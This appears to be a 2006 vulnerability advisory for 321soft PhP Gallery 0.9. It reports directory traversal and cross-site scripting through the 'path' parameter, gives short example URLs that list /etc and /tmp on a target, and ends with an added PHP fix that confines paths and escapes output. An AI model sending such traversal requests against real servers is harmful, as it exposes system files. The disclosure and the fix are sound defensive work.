321soft PhP Gallery 0.9 - directory travel & XSS May 02 2006 11:41PM
d4igoro gmail com
321soft PhP Gallery 0.9 - directory travel & XSS

--------------------------------------------------------

Software: 321soft PhP Gallery

Version: 0.9

Type: directory traversal & XSS

Date: May 3 01:38:04 CEST 2006

Vendor: 321soft.de

Page: http://321soft.de/

Risk: Middle

credits:

----------------------------

d4igoro - d4igoro[at]gmail[dot]com

http://d4igoro.blogspot.com/

vulnerability:

----------------------------

http://[target]/index.php?path=/etc

http://[target]/index.php?path=/tmp

http://[target]/index.php?path=[XSS]

solution:

----------------------------

index.php

fix $path

notes:

----------------------------

The vendor has been informed.

http://d4igoro.blogspot.com/2006/05/321soft-php-gallery-09-directory.html
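
One way to carry out the "fix $path" step in index.php, shown as an added example that is not part of the original advisory and not the vendor's code: it confines the `path` parameter to a gallery root and HTML-escapes everything echoed back. `GALLERY_ROOT`, `resolve_gallery_path()` and `h()` are hypothetical names, and the directory layout is an assumption.

```php
<?php
// Added example, not 321soft's code. GALLERY_ROOT and both helpers are assumed names.
const GALLERY_ROOT = __DIR__ . '/gallery'; // hypothetical directory holding the images

// Map a user-supplied ?path= value to a directory inside $root.
// Returns the canonical absolute path, or null when the request must be rejected.
function resolve_gallery_path(string $userPath, string $root = GALLERY_ROOT): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false || strpos($userPath, "\0") !== false) {
        return null; // missing root or NUL byte in input: fail closed
    }
    // Always treat the input as relative to the root, so "/etc" becomes "<root>/etc".
    // realpath() then collapses "..", "." and symlinks to one canonical path.
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . ltrim($userPath, "/\\"));
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // Accept the root itself or anything below it. The trailing separator keeps
    // a sibling such as "<root>-old" from passing the prefix comparison.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if ($candidate !== $rootReal && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Escape a value for HTML body or attribute context before echoing it.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$requested = (isset($_GET['path']) && is_string($_GET['path'])) ? $_GET['path'] : '';
$dir = resolve_gallery_path($requested);
if ($dir === null) {
    http_response_code(400);
    echo 'Invalid path'; // never reflect the rejected value back to the client
    exit;
}

echo '<h1>Gallery: ', h($requested), '</h1><ul>';
foreach (scandir($dir) ?: [] as $entry) {
    if ($entry !== '.' && $entry !== '..') {
        echo '<li>', h($entry), '</li>'; // file names are untrusted output too
    }
}
echo '</ul>';
```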
